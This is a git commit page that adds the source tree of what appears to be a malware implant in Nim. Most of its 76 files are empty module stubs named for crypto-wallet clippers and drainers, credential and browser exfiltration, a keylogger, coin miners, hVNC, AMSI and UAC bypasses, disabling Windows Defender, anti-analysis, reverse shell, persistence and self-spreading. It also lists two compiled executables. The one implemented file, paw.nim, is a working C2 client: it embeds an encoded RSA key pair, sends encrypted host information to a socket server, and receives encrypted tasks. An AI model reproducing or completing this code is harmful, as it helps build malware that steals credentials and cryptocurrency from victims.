dff/c2_backend_template-paw
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Upload of project source code files.

Browse Source
This commit is contained in:
unknown
2026-02-17 04:15:44 +01:00
parent db12559212
commit fe6f14157c
76 changed files with 1145 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
components/implant/config.d Normal file
View File

@@ -0,0 +1,3 @@
type
Configuration = ref object
implant_private_key: string

0
components/implant/listener.d Normal file
View File

0
components/implant/modules/block_websites.d Normal file
View File

0
components/implant/modules/clipper/btc.d Normal file
View File

0
components/implant/modules/clipper/clipper.d Normal file
View File

0
components/implant/modules/clipper/eth.d Normal file
View File

0
components/implant/modules/clipper/ltc.d Normal file
View File

0
components/implant/modules/clipper/sol.d Normal file
View File

0
components/implant/modules/clipper/usdt.d Normal file
View File

0
components/implant/modules/clipper/xmr.d Normal file
View File

0
components/implant/modules/drainer/atomic.d Normal file
View File

0
components/implant/modules/drainer/btc.d Normal file
View File

0
components/implant/modules/drainer/drainer.d Normal file
View File

0
components/implant/modules/drainer/eth.d Normal file
View File

0
components/implant/modules/drainer/exodus.d Normal file
View File

0
components/implant/modules/drainer/ltc.d Normal file
View File

0
components/implant/modules/drainer/sol.d Normal file
View File

0
components/implant/modules/drainer/usdt.d Normal file
View File

0
components/implant/modules/drainer/xmr.d Normal file
View File

0
components/implant/modules/exfiltration/browser.d Normal file
View File

0
components/implant/modules/exfiltration/files.d Normal file
View File

0
components/implant/modules/exfiltration/game.d Normal file
View File

0
components/implant/modules/exfiltration/mail.d Normal file
View File

0
components/implant/modules/exfiltration/messenger.d Normal file
View File

0
components/implant/modules/exfiltration/network.d Normal file
View File

0
components/implant/modules/exfiltration/system.d Normal file
View File

0
components/implant/modules/exfiltration/vpn.d Normal file
View File

0
components/implant/modules/exfiltration/wallet.d Normal file
View File

0
components/implant/modules/hvnc/hvnc.d Normal file
View File

0
components/implant/modules/injections/injection.d Normal file
View File

0
components/implant/modules/injections/mail.d Normal file
View File

0
components/implant/modules/injections/messenger.d Normal file
View File

0
components/implant/modules/injections/wallet.d Normal file
View File

0
components/implant/modules/keylogger.d Normal file
View File

0
components/implant/modules/miner/btc.d Normal file
View File

0
components/implant/modules/miner/eth.d Normal file
View File

0
components/implant/modules/miner/ltc.d Normal file
View File

0
components/implant/modules/miner/miner.d Normal file
View File

0
components/implant/modules/miner/sol.d Normal file
View File

0
components/implant/modules/miner/usdt.d Normal file
View File

0
components/implant/modules/miner/xmr.d Normal file
View File

0
components/implant/modules/persistence.d Normal file
View File

0
components/implant/modules/porn_detection.d Normal file
View File

0
components/implant/modules/privilege_escalation/amsi_bypass.d Normal file
View File

0
components/implant/modules/privilege_escalation/destroy_wd.d Normal file
View File

0
components/implant/modules/privilege_escalation/disable_etw.d Normal file
View File

0
components/implant/modules/privilege_escalation/disable_wd.d Normal file
View File

0
components/implant/modules/privilege_escalation/uac_bypass.d Normal file
View File

0
components/implant/modules/protection/anti_analysis.d Normal file
View File

0
components/implant/modules/protection/anti_debug.d Normal file
View File

0
components/implant/modules/protection/anti_vm.d Normal file
View File

0
components/implant/modules/reverse_shell.d Normal file
View File

0
components/implant/modules/shellcode_loader.d Normal file
View File

0
components/implant/modules/spread/mail.d Normal file
View File

0
components/implant/modules/spread/messenger.d Normal file
View File

0
components/implant/modules/spread/network.d Normal file
View File

0
components/implant/modules/spread/spread.d Normal file
View File

BIN
components/implant/out/rawr.exe Normal file
View File

Binary file not shown.

0
components/implant/paw.d Normal file
View File

BIN
components/implant/paw.exe Normal file
View File

Binary file not shown.

114
components/implant/paw.nim Normal file
View File

@@ -0,0 +1,114 @@
import std/[asyncdispatch, net, base64, json, strutils, openssl, tables]
type
Configuration = ref object
socket_server: string
implant_private_key: string
implant_public_key: string
let configInstance = Configuration(
socket_server: "127.0.0.1:42720",
implant_private_key: decode("LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUpRZ0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQ1N3d2dna29BZ0VBQW9JQ0FRQ3hFSFEzdWZVMFNpSmcKMEtGQW5raUM3bFRHVklVNzRVZ1lhb1dIR2FhajIyaUJ5ZTFMZklRK0VTNUNaSG5vSFh6SEkySkJySTBMZFdzUwpGVXhobTBYMk04UERvdDNpUlBNRDNPOWZlTEhENVRkMmtzTW8wek1jZVE3M2I0cllqWXNSQk1LdFJ0ODB2eERTCmdPaSt4M3RFWkl0ZkwxQ2l6VW9SNmRWZ0hlQXVPcU9NMjdocGNrdVRLTWRhZHY1ZDZEZ09ON2NFVHhMdUpZbm4KMmtnT2N2clJiaXdqSFEyQzhSNVpodWpOcUE0RCtGVWJrbVJRcWtzM1huZksxOEExM25LTjMrak56RjdJbGxYagpmVEpDYTFoWFpYbE1mbnBWc3d4ZG1rRUp1QUVCT0NSelBjUmt4cWJjNERmR1RTam1hcW5YMXRlZUxGTFVEUkdVCmw2SHI4MGJDeTRIcmxDSFo5QWlpT1Y0Q2t2VmRMU1dEODFPWmFNd0lhSklOSVpnY3dJcjJndWZTWHZuaFBGdEYKNVBqcGFPQVhXVDRVRGJSOTFYcUtYa3BYdTRmZkhpdi9UMkxDRURmSnU3b0Fyb21CbktuL1VJb25zSFdFSkFtawptSHZQUjNzNnVMam94SnE1WC9WUGFxZXV4aExUQ1ArU3YweDhvTHdSZVF3RnZYbk5FYk5YeWxNZ1ZBd3ZTZHhPCnJqczBkbUNOemY0U25DaFRuR2J6TUZIRDVRUTRUN1dWMjdxZDY4VDNnUlBZSEZ3Y1hta0s0YlVMTHEydG9XcHcKTFkvRTIrRnIxUmplSzRsMDJpRk9wSUY2eXZtV2ZNdlYySUZxM1I3SmhUMUcyWklIbm1qRDhCMVdRcVgraHFPcgo3SEZoZlJ1ZzRETm9Tbm1pV0FHUDBSN2NXdHBzY3dJREFRQUJBb0lDQURoeTYvSTJMVWU1Mk1MdjBIRFc1WHdrCmVrOXVjN2wyNVhLdlJ4bWVvbU03MkZJRWE4djBpdjUwb01CVzR3eU9saEN3cGFzVlZUUVJmNHlZMEt5UGdacnYKdnRvWWlzK1B0c0FGQ0NWeVI0NFIvZ0FsNHVVWmpBSm9UODZ2dDE2NXBWdk1IanA2elQ4MktLbExvcWZyMWM4awpsTkJJTjlkblJsVjJyR21Eck14Z01uTCtPNGtXZ0tTT1RCdjVzcmVDaUpoeng3dXViL1VQYjZ0RWlsTmM4YnloCitKMUxMbHNQL3VLQTRhaHJDdWpXRzEvNmFGUFZMcnljdCtrcHBtUW1JblE3cmE4cW1BOHY2bnJubDRYWVRpWXkKdWh5YWQrcnBkYWhEdkxkWis2d0ZWNDJMNUJoU3dyREpKTTdxRzM5MkF1YkdYaUJWdGlSWGRFTGdvcVVqL21zawp6TWs4elhxK2hvMnB2M0R0QVpBWnJGcXZwb2syM0I5bTBhYzBZUlBMWEVXVTVMdTVYdVBhNWhGNXNkRDBmeGdOCnRtNDI0V3V0L282TkF0R3FteGVjbVUyRHB3cWlFTVRsSzNyNW1PR0xvWitVS0V3Wkd6ZHlkRmtEMUFOMzUrZGIKQ0hJYittWjlxT2N3YlNZbWNJZ1pXWmJNcWYxcTQ3ay9iczQ5QWg2U2ZnbkNGV1VHSUVlekJJbktuaGVMS2dJVwo5UWZvdmxCUm5DRVlsdkFnbm5RLzJOdDFuUXA2M0Y2TlVLaERJQXlNUjdDaU5FdnlVbnErTG1hNjRuL2tSMnpxCmlGK0FJNlNLeENHVXFpTmgrWEpoZEVEdy9YajZ1V28vSDVSVXVudUtRU3lySU1FRE9KTnZxYk1iRS9Ud1Uxbm0KY2ZqZkloQWU1MUVsaXN3Y0J3K1ZBb0lCQVFEaW9ReXJIMW1mN2d0aE1Ca3BpNTV0NnhoSVFhcnIrY1h0eFFBbgpYL3NDSmg0cGZGMWRXNlB6UEpMeVJpWU9pQ3haa01KcEptTDdjclVSSnRFSXNqRlg0eEZIZ29LaUtQUUFVTjBWCkhyK3NmcFBBcUh1NWY1VzdoRVdCdFRIU1licWVMSU9meVNlUmpHNDEwWC9QRDJ2ZzBSUzByL0xqcXlpcXFOUEUKQlR5RjdUbEJzbjZwUkhlVGpyVjBOOEh5UHVLNGY2ZzUvMCtiOUxiR0FrK01za2Z2VkpBQndhdEFMQlJWaWtlSwpBZk9uVkpmMEJaVWVPMTduUVR6TGtMazV1RGpFSTZsUmRJMUgwbTBaRVNoNHgvTnNMbVBhc05EdHZQdVJzVFVhCkJLZmN1WGFsUzE3eWQxYW1RcUR0WUJ5V3lja2VxVWhPZUxIME1wUmFRSzgrVWgzbkFvSUJBUURJQXZtMk1nMlkKVVEvaVkvK3huSnE2UDRIVHVMUWVEalBRWkJVT3dFNGtUM1BvRGdGQ3Z0alNxWjdtU0djR2p6Z3kzbCtHL25kOQpGZUxyVlhqR1B1dURYTFhVSFRhWndJRWc1bytwQjFOclg2czZzKytMa0FteTZrMS9pUXhWRXFYaXFxdG9TWnZhClNqYVkwZW1ZZTIzWkxLaWtCRXhkM2gxUUY4OFVhYTd1WFB1T240MU5raDdtWmRsTEt5WmpNN1VJay96b3VscjYKVlROdWNmazY0MmRUeWNLMUhkaDFBRnlkb0FFam5ZaTNhNGVDRFp2Q0NXeWlSRDVLVFpNL2d1Rk9HRWQycE5EQQpqQ0Nxb1poSnltcW1JY3llL2pBQ1FpeTdJZEpEZ01BbEhrVEhkR2pWZ0hvUG41MGZydUwyQ1VleE9IdGM5QW8vCjJwOGtnYWsyMWpPVkFvSUJBUUNPa3g4ek1OL2ptNUNSTGY5R2djM0QvUmtqckJ4cHBKTit5R2NXWG0yOXBsbG4KWkJRZ3ZaeGhWQVJtWXZkaVFRMFZzOXA2NkdseEkzTUNQVmRZanpJM3htU0NobnJFcGRzTHI5UEdpN2V1UDF1WQo0dVlqaHo2ZDM5TVNqUG14RDBhbVovN09zWEF4UXhXNnlmZ01QZmx5VUZja2JXVHpFaVRkYUtVQk53SWloMkYwCkVXVlorL2IyWDl1TUo5L2VGTzN4Z0c1SFBuWEkrYVZhNE8xRzZJb1U2VEJIeXAyQUc3c1hMWTFnSjJZd0tTb0gKbk5ONVY0U1hIQld4UTNVaitOL05sVm5hSXVjVy9pMGdqZ2pXSTRUaTFEU0J5cWRHU1pSQ3ppZElIUkcxN1AvVgpjWnRrRXV2eVlReDVDZlF5Y1BRVVZBOW5Qc3RGZytTTSt4REV0a2lWQW9JQkFDOTRGVS9hZlVPREthUHZXOFlKCmh1ZGhIeXppajB6NnplMU5jM24yeGhUMERtd3F0cjNpa1k4ZDFxcU0wSGJNRXVodnduaEZlSkpsV1YvRS8wNzkKcStPWFkwZ2VUdEVhMFFxLzdhU09Lb3czUG1wR1Bqbi9TMjM5RWJ1TkNUSS9wTU14QWxGVDl2dE4xYnRiUm5kOApBOHdoUHp6K0VDblBCMkgwNUo3Um5rVFFLSnZtM2lCazU1U0M0NWxsZWt6Yy9zQTBiemZFMHNiSzVkUDJsTklYCkduVFdVN0dzamF6bkV4UU4zM2RXY2hZbUhSa09wY0xkZmJ6ZE9YTmxDZWR1NW80a1VRR2xpQzNLbEE0ckgvdVQKWU5CaEFURlMzbzRLcXBjWEpkSURncGJNb2tJOExJMVBXcWpPbHZub0JkR2l6ak1QVnFmdSsyZkFPVGp1MVB4QQp4aWtDZ2dFQUc0R2VlRDdxWVBuYU81OUNmYXozZjQ3MDI3RExMNnFjbk55OE5yV1VIaW5raGVwYy9wNTI1R05zCkFyWElLNkFCVG1VTXdaZE8xZXRaaVJVVHFHL0dIY0w5SllFWFdHTEZ0RGJRREgzaDNVMGNQRHJHYTI5Z3ZIdE8KcTBBb01NNW1xUXkydUVlVzBmSlNGcUEzN2VTTitiQ3dhMndqd0hyUVFBZUE3NnZsTEJ3RW5HRjcxVkdNb3pDRwptR294anJzNkxicmQzYmVScXZkckZUalJZcmZWaVc2c094Q3ZXNGQwTUtyMlI4bHg2TkpzMzA0RG5zTi81TGgwCjFCTzc2eWx0VHVoL1FHQ2thOG1lYzNpdlh3NU9NSy9NSk5MUGxDOVduS1I3d1VMQXpFeHcvQWtOZnBCMFlCR3MKc1crS0xCMnVGd2N3UVllaW9Uc3piSG9wRElZWmdRPT0KLS0tLS1FTkQgUFJJVkFURSBLRVktLS0tLQo="),
implant_public_key: decode("LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQ0lqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FnOEFNSUlDQ2dLQ0FnRUFzUkIwTjduMU5Fb2lZTkNoUUo1SQpndTVVeGxTRk8rRklHR3FGaHhtbW85dG9nY250UzN5RVBoRXVRbVI1NkIxOHh5TmlRYXlOQzNWckVoVk1ZWnRGCjlqUER3NkxkNGtUekE5enZYM2l4dytVM2RwTERLTk16SEhrTzkyK0sySTJMRVFUQ3JVYmZOTDhRMG9Eb3ZzZDcKUkdTTFh5OVFvczFLRWVuVllCM2dManFqak51NGFYSkxreWpIV25iK1hlZzREamUzQkU4UzdpV0o1OXBJRG5MNgowVzRzSXgwTmd2RWVXWWJvemFnT0EvaFZHNUprVUtwTE4xNTN5dGZBTmQ1eWpkL296Y3hleUpaVjQzMHlRbXRZClYyVjVUSDU2VmJNTVhacEJDYmdCQVRna2N6M0VaTWFtM09BM3hrMG81bXFwMTliWG5peFMxQTBSbEplaDYvTkcKd3N1QjY1UWgyZlFJb2psZUFwTDFYUzBsZy9OVG1Xak1DR2lTRFNHWUhNQ0s5b0xuMGw3NTRUeGJSZVQ0NldqZwpGMWsrRkEyMGZkVjZpbDVLVjd1SDN4NHIvMDlpd2hBM3lidTZBSzZKZ1p5cC8xQ0tKN0IxaENRSnBKaDd6MGQ3Ck9yaTQ2TVNhdVYvMVQycW5yc1lTMHdqL2tyOU1mS0M4RVhrTUJiMTV6Ukd6VjhwVElGUU1MMG5jVHE0N05IWmcKamMzK0Vwd29VNXhtOHpCUncrVUVPRSsxbGR1Nm5ldkU5NEVUMkJ4Y0hGNXBDdUcxQ3k2dHJhRnFjQzJQeE52aAphOVVZM2l1SmROb2hUcVNCZXNyNWxuekwxZGlCYXQwZXlZVTlSdG1TQjU1b3cvQWRWa0tsL29hanEreHhZWDBiCm9PQXphRXA1b2xnQmo5RWUzRnJhYkhNQ0F3RUFBUT09Ci0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQo="),
)
let ip = configInstance.socket_server.split(":")[0]
let port = parseInt(configInstance.socket_server.split(":")[1])
var system_information = initTable[string, string]()
system_information["host"] = "test"#getHostName()
system_information["user"] = "test2"#getUsername()
let sysinf = %*system_information
proc rsaPrivateDecrypt(rsa: PRSA, encryptedData: string): string =
let keySize = RSA_size(rsa)
var decryptedData: seq[uint8] = newSeq[uint8](keySize)
ERR_clear_error()
let resultLen = RSA_private_decrypt(
cint(len(encryptedData)),
cast[ptr uint8](encryptedData.cstring),
cast[ptr uint8](decryptedData[0].addr),
rsa,
RSA_PKCS1_PADDING
)
if resultLen == -1:
let err = ERR_get_error()
let errStr = ERR_error_string(err, nil)
echo "RSA decryption failed with error: ", errStr
raise newException(ValueError, "RSA decryption failed")
setLen(decryptedData, resultLen)
return $decryptedData
proc rsaPublicEncrypt(rsa: PRSA, dataToEncrypt: string): seq[uint8] =
let keySize = RSA_size(rsa)
var encryptedData: seq[uint8] = newSeq[uint8](keySize)
ERR_clear_error()
let resultLen = RSA_public_encrypt(
cint(len(dataToEncrypt)),
cast[ptr uint8](dataToEncrypt.cstring),
cast[ptr uint8](encryptedData[0].addr),
rsa,
RSA_PKCS1_PADDING
)
if resultLen == -1:
let err = ERR_get_error()
let errStr = ERR_error_string(err, nil)
echo "RSA encryption failed with error: ", errStr
raise newException(ValueError, "RSA encryption failed")
setLen(encryptedData, resultLen)
return encryptedData
proc sock_conn() =
var implant = newSocket()
implant.connect(ip, Port(port))
implant.send(configInstance.implant_public_key)
#var agent_id = implant.recv(64)
let pubbio = BIO_new_mem_buf(cast[ptr byte](addr configInstance.implant_public_key[0]), -1)
let pubrsa = PEM_read_bio_RSA_PUBKEY(pubbio, nil, nil, nil)
let privbio = BIO_new_mem_buf(cast[ptr byte](addr configInstance.implant_private_key[0]), -1)
let privrsa: PRSA = PEM_read_bio_RSA_PRIVATEKEY(privbio, nil, nil, nil)
if pubrsa.isNil or privrsa.isNil:
echo "Failed to load RSA keys"
else:
echo "RSA keys successfully loaded"
echo "System Information: ", $sysinf
let sysinf: seq[uint8] = rsaPublicEncrypt(pubrsa, $sysinf)
#let sysinf: seq[uint8] = rsaPublicEncrypt(pubrsa, "testdata")
echo "Encrypted Data: ", encode(sysinf)
implant.send(encode(sysinf))
while true:
var task: string = implant.recv(4096)
echo "Encrypted task: ", task
var res = rsaPrivateDecrypt(privrsa, task)
echo "Task: ", res
discard BIO_free(pubbio)
discard BIO_free(privbio)
proc main() {.async.} =
echo "RSA Implant Private Key: ", configInstance.implant_private_key
echo "RSA Implant Public Key: ", configInstance.implant_public_key
sock_conn()
waitFor main()

0
components/implant/sender.d Normal file
View File